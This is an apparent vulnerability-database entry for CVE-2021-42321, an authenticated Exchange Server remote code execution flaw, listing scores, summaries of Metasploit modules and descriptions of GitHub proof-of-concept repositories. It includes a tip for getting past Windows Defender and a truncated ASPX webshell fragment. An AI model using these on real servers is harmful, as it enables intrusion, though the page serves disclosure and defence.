CVE-2021-42321

Published: 10/11/2021 Updated: 28/12/2023
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 580
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Microsoft Exchange Server Remote Code Execution Vulnerability

Vulnerable Product

microsoft exchange server 2016

microsoft exchange server 2019

Exploits

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22, all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities ...
This Metasploit module allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2. Note that authentication is required to exploit this v ...

Github Repositories

cve-2021-42321

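exch_CVE-2021-42321: This is the tool referenced in the 7bits security team article "DotNet Security: CVE-2021-42321 Reproduction". The TypeConfuse chain is changed to write a file, bypassing Windows Defender's blocking of w3wp.exe from starting processes. Overwrite the original ysoserial.net file with this file and recompile. Follow our official account - Zbits2022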

Microsoft Exchange Server Poc

CVE-2021-42321 Microsoft Exchange Server Poc. The patch: msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321

CVE-2022-23277 POC to write a webshell to aspnet_client

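exch_CVE-2021-42321: This is the tool referenced in the 7bits security team article "DotNet Security: CVE-2022-23277 Vulnerability Reproduction". The authentication part must be added manually through Burp Suite; on successful exploitation, 1.aspx is written to aspnet_client. webshell: <%@ Page Language="JScript" Debug="true"%><%@Import Namespace="SystemIO"%><%FileWriteAllB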

Recent Articles

Let us give thanks that this November, Microsoft has given us just 55 security fixes, two of which are for actively exploited flaws
The Register • Thomas Claburn in San Francisco • 09 Nov 2021

Light load has infosec bods wondering what awaits next month

Patch Tuesday As the US season of giving thanks and turkey carnage approaches, let us reflect upon Microsoft's November Patch Tuesday, which has bestowed 55 CVEs and the promise of continued employment for the IT admins who have to clean up the recurring mess of software. Only six of the vulnerabilities are considered "Critical," the rest are just "Important." Affected applications include: 3D Viewer, Azure (including RTOS and Sphere), Dynamics, Edge, Exchange Server, Office, Power BI, Role: Win...

China is likely stockpiling and deploying vulnerabilities, says Microsoft
The Register

Increase in espionage and cyberattacks since law requiring vulnerabilities first be reported to Beijing

Microsoft has asserted that China's offensive cyber capabilities have improved, thanks to a law that has allowed Beijing to create an arsenal of unreported software vulnerabilities. China's 2021 law required organizations to report security vulnerabilities to local authorities before disclosing them to any other entity. The rules mean Beijing can use local research to hoard vulnerability information. A year later, researchers from the Atlantic Council found there was a decrease in reported vulne...